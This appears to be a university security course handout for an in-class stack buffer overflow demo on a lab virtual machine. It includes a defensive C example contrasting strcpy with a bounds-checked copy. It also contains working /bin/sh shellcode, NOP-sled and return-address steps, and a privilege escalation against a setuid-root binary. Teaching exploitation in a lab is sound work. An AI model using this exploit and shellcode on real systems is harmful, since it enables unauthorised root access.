These in-class demonstrations are designed to work inside a virtual machine running (an ancient) version of Linux. We provide basic VM images for either Oracle VirtualBox or vmware. CSL Linux machines all have VirtualBox pre-installed.
- Download Oracle's VirtualBox: https://www.virtualbox.org/wiki/Downloads
- Download VMware Workstation Player: https://my.vmware.com/en/web/vmware/free#desktop_end_user_computing/vmware_workstation_player/12_0
- OVF: http://pages.cs.wisc.edu/~ace/assets/Boxes2.ovf
- Disk: http://pages.cs.wisc.edu/~ace/assets/Boxes2-disk1.vmdk
- VMware image: http://pages.cs.wisc.edu/~ace/assets/vmware-boxes-2.1.tar.bz2
- The user account username/password: user/user
- The root account username/password: root/root
Sometimes accessing the VM via SSH is easier (copy-paste may work better, and you can transfer files both ways using the scp command). Start up the VM, log in as user or root, and find the local IP address using the command:
/sbin/ifconfig
Find the inet address assigned to this VM (yours will likely differ from the one shown here):
inet addr:172.16.250.140
Connect via SSH:
ssh user@172.16.250.140
Copy files TO the VM:
scp demo/* user@172.16.250.140:~/
Copy files FROM the VM:
scp user@172.16.250.140:~/* demo/
This meet.c exploit demo is taken from Chapter 11 of the Ethical Hacker's Handbook (http://www.pdf-archive.com/2011/02/23/gray-hat-hacking/gray-hat-hacking.pdf). See this document if you get stuck and need more information.
On the VM, after you've copied these source files, compile the source code.
gcc -o meet meet.c
gcc -o get_sp get_sp.c
./meet Ace H@x0r
perl -e 'print "A"x200'
echo $(perl -e 'print "A"x200')
./meet Ace $(perl -e 'print "A"x200')
./meet Ace $(perl -e 'print "A"x500')
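As an added illustration of the defect these commands trigger (this is not meet.c from the handbook; the 400-byte buffer size is an assumption chosen so that the 200-byte argument fits and the 500-byte one does not), here is the unbounded-copy pattern next to a bounds-checked version that rejects oversized input instead of writing past the end of the buffer:

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed buffer size for this illustration (not taken from meet.c). */
#define NAME_LEN 400

/* The defect the demo exploits: argv-controlled data copied into a fixed-size
 * stack buffer with strcpy(), which never learns the destination size. Input of
 * NAME_LEN bytes or more runs past name[] into the saved frame pointer and
 * return address. Kept here only as the "before"; never pass it long input. */
void greet_unsafe(const char *who, const char *name_in)
{
    char name[NAME_LEN];
    strcpy(name, name_in);              /* unbounded copy */
    printf("Hello %s %s\n", who, name);
}

/* Hardened form: check the length against the real buffer size, fail closed
 * instead of silently truncating, and copy exactly len+1 bytes so the NUL
 * terminator is always written. Returns 0 on success, -1 if the input does
 * not fit. */
int greet_safe(const char *who, const char *name_in)
{
    char name[NAME_LEN];
    size_t len = strlen(name_in);

    if (len >= sizeof name) {
        fprintf(stderr, "rejected: %zu bytes, buffer holds %zu\n",
                len, sizeof name - 1);
        return -1;
    }
    memcpy(name, name_in, len + 1);     /* len < sizeof name, so the NUL fits */
    printf("Hello %s %s\n", who, name);
    return 0;
}

/* Helper: build a string of n 'A' characters (the same payload the perl
 * one-liners produce) and pass it through greet_safe. Returns greet_safe's
 * result, or -2 if allocation fails. */
int greet_safe_with_fill(size_t n)
{
    char *fill = malloc(n + 1);
    int rc;

    if (fill == NULL)
        return -2;
    memset(fill, 'A', n);
    fill[n] = '\0';
    rc = greet_safe("Ace", fill);
    free(fill);
    return rc;
}

int main(int argc, char **argv)
{
    if (argc != 3) {
        fprintf(stderr, "usage: %s <greeting> <name>\n", argv[0]);
        return 2;
    }
    return greet_safe(argv[1], argv[2]) == 0 ? 0 : 1;
}
```

Compiled with `gcc -o greet greet.c`, `./greet Ace "$(perl -e 'print "A"x200')"` prints the greeting while the 500-byte argument is rejected with a non-zero exit status rather than corrupting the stack. The check compares against `sizeof name` rather than a separately maintained constant so that the bound cannot drift from the buffer it protects.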
Make a copy of meet and mark it setuid root (remember the root password is root).
su root
cp meet super-meet
chown root:root super-meet
chmod u+s super-meet
exit
Be careful copy-pasting this command. Copy-pasting might introduce unintended line break characters.
perl -e 'print "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";' > shellcode
Check the length: the shellcode file should be 53 bytes. If not, something is wrong. Maybe you accidentally added an unintended line break or some other character.
wc -c shellcode
./get_sp
Check it twice! It shouldn't change.
./get_sp
Compute an approximate landing spot: ESP - 0x300.
(In the lines below, substitute your own ESP values.)
Stack pointer (ESP): 0xbffff672 - 0x300 = 0xbffff372
Convert to little-endian: 0x72 0xf3 0xff 0xbf. Use perl to print these four bytes 38 times:
perl -e 'print "\x72\xf3\xff\xbf"x38' > sp-repeat
Run the exploit. Keep changing the size of the nop sled until you align the exploit properly on the stack. Try 200, 201, 202, ....
./meet ace $(perl -e 'print "\x90"x200'; cat shellcode sp-repeat)
Check super-meet; it should be marked setuid:
ls -l
Check your id; it should be user (uid 1000):
id
Run the exploit against super-meet. If you get a shell, check your uid using id.
./super-meet ace "$(perl -e 'print "\x90"x200'; cat shellcode sp-repeat)"
gcc -o width width.c
./width 5 "Hello there"
./width 85 "Hello there"
./width 65536 "Hello there"
If you find any problems with this demo: send me an email, file an issue, or better yet, just send me a pull request.